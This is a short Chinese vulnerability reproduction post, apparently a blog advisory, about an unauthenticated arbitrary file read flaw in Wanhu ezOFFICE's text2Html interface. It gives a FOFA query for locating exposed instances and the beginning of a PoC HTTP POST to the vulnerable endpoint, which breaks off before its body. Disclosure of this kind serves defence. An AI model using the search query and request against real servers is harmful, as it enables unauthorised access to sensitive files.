万户ezOFFICE text2Html 任意文件读取漏洞

免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为承担任何责任,一旦造成后果请自行承担!

一、产品介绍

万户OAezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。

二、漏洞描述

万户ezOFFICE text2Html 接口处存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞读取敏感文件。

三、漏洞危害

未经身份认证的攻击者可以通过此漏洞读取敏感文件。

四、漏洞复现

FOFA:app="ezOFFICE协同管理平台"

万户ezOFFICE text2Html 任意文件读取漏洞_第1张图片

POC

POST /defaultroot/convertFile/text2Html.controller HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78
Content-Length: 63
Accept: text/html,application/xhtml+xm

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)